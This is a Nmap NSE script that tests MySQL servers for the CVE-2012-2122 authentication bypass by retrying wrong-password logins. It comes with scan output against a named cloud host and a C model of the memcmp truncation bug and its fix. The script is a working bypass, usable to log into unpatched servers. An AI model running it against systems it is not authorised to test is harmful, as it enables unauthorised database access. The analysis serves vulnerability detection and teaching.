mysql-auth-bypass.nse (Nmap NSE script that probes a MySQL server for CVE-2012-2122 by repeatedly logging in with a wrong password; the required modules are declared at the top so the script loads on its own):

```lua
local mysql = require "mysql"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local unpwdb = require "unpwdb"

portrule = shortport.port_or_service(3306, "mysql")

action = function( host, port )
  local socket = nmap.new_socket()
  local catch = function() socket:close() end
  local try = nmap.new_try(catch)
  local result = {}

  -- set a reasonable timeout value
  socket:set_timeout(5000)
  -- get our usernames to try
  local usernames = try(unpwdb.usernames())
  -- any wrong password will do once the bug triggers; the CVE id is used so
  -- the attempts are recognisable in the server's logs
  local password = "cve-2012-2122"

  for username in usernames do
    stdnse.print_debug( "Trying %s ...", username )
    -- the bypass is probabilistic (roughly 1 in 256 per login), so reconnect
    -- and retry the same credentials up to 300 times before giving up
    for i = 0, 300, 1 do
      stdnse.print_debug(2, "attempt number %d", i )
      local status, response = socket:connect(host, port)
      if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end

      status, response = mysql.receiveGreeting( socket )
      if ( not(status) ) then
        stdnse.print_debug(3, "%s: %s", SCRIPT_NAME, response)
        socket:close()
        return response
      end

      -- send the wrong password with the post-4.1 scramble; an error code of
      -- zero means the server accepted it
      status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
      if status and response.errorcode == 0 then
        table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) )
        socket:close()
        break
      end

      socket:close()
    end
  end

  return stdnse.format_output(true, result)
end
```

Run against a test host:

```
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up (0.050s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-auth-bypass:
|_  user nse is vulnerable to auth bypass
```

The same run with verbose and debug output enabled (the capture ends after the timing report):

```
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
```
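The script only works because CVE-2012-2122 is a truncation bug: MySQL's `check_scramble()` returned the `int` result of `memcmp()` through its `my_bool` (a plain `char`) return type, so any nonzero comparison result whose low byte is zero was reported as a match, which is about 1 in 256 logins when the platform's `memcmp` returns wide differences. The C program below is an added example, not part of this gist or of MySQL's source; `wide_memcmp` is a constructed model of an optimised `memcmp` (it returns the full 32-bit word difference rather than -1/0/1) and stands in for the libc behaviour, and the hash buffers are constructed inputs. It shows the vulnerable return shape beside the hardened one and counts how often each accepts a non-matching hash.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SHA1_HASH_SIZE 20

/* MySQL's my_bool is a plain char; narrowing an int to it is the bug. */
typedef char my_bool;

/*
 * Constructed model of an optimised memcmp (an assumption for this example,
 * not libc's implementation): compare 4-byte big-endian words and return the
 * raw 32-bit difference. Real SSE memcmp builds likewise return values far
 * outside [-255, 255], which is what made the truncation reachable.
 */
int wide_memcmp(const unsigned char *a, const unsigned char *b, size_t n)
{
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wa = ((uint32_t)a[i] << 24) | ((uint32_t)a[i + 1] << 16) |
                      ((uint32_t)a[i + 2] << 8) | (uint32_t)a[i + 3];
        uint32_t wb = ((uint32_t)b[i] << 24) | ((uint32_t)b[i + 1] << 16) |
                      ((uint32_t)b[i + 2] << 8) | (uint32_t)b[i + 3];
        if (wa != wb)
            return (int)(wa - wb);      /* wraps mod 2^32; never -1/0/1 */
    }
    for (; i < n; i++)
        if (a[i] != b[i])
            return (int)a[i] - (int)b[i];
    return 0;
}

/* Vulnerable shape: the int from memcmp is returned through my_bool (char).
 * On common compilers the conversion keeps only the low byte, so a result
 * such as 256 becomes 0, and 0 means "the password matched". */
my_bool check_scramble_vulnerable(const unsigned char *expected,
                                  const unsigned char *got)
{
    return wide_memcmp(expected, got, SHA1_HASH_SIZE);
}

/* Hardened shape: collapse the comparison to a boolean before narrowing. */
my_bool check_scramble_fixed(const unsigned char *expected,
                             const unsigned char *got)
{
    return wide_memcmp(expected, got, SHA1_HASH_SIZE) != 0;
}

typedef my_bool (*scramble_check)(const unsigned char *, const unsigned char *);

/* Build a stored hash whose first word is `word` (all other bytes zero),
 * compare it with an all-zero client hash, and report whether `check`
 * accepts the mismatch (1) or rejects it (0). */
int accepts_word(scramble_check check, uint32_t word)
{
    unsigned char expected[SHA1_HASH_SIZE] = {0};
    unsigned char got[SHA1_HASH_SIZE] = {0};   /* constructed client hash */
    expected[0] = (unsigned char)(word >> 24);
    expected[1] = (unsigned char)(word >> 16);
    expected[2] = (unsigned char)(word >> 8);
    expected[3] = (unsigned char)word;
    return check(expected, got) == 0;
}

/* Sweep the first word over 1..65535 (never equal to the client's zero word)
 * and count false accepts. The vulnerable check accepts every multiple of
 * 256, i.e. 255 of 65535 inputs, about 1 in 256. */
unsigned count_false_accepts(scramble_check check)
{
    unsigned accepts = 0;
    for (uint32_t v = 1; v <= 0xFFFF; v++)
        if (accepts_word(check, v))
            accepts++;
    return accepts;
}

int main(void)
{
    printf("vulnerable: %u false accepts out of 65535\n",
           count_false_accepts(check_scramble_vulnerable));
    printf("fixed:      %u false accepts out of 65535\n",
           count_false_accepts(check_scramble_fixed));
    return 0;
}
```

Two caveats follow from the model. First, only builds whose `memcmp` returns values outside [-255, 255] are affected; a server compiled against a byte-wise `memcmp` never hits the truncation, so the script reporting nothing does not prove the binary is patched. Second, each login succeeds with probability about 1/256, so 300 attempts still miss a vulnerable account with probability (255/256)^300, roughly 31%; a single negative run of the script is not conclusive and should be repeated.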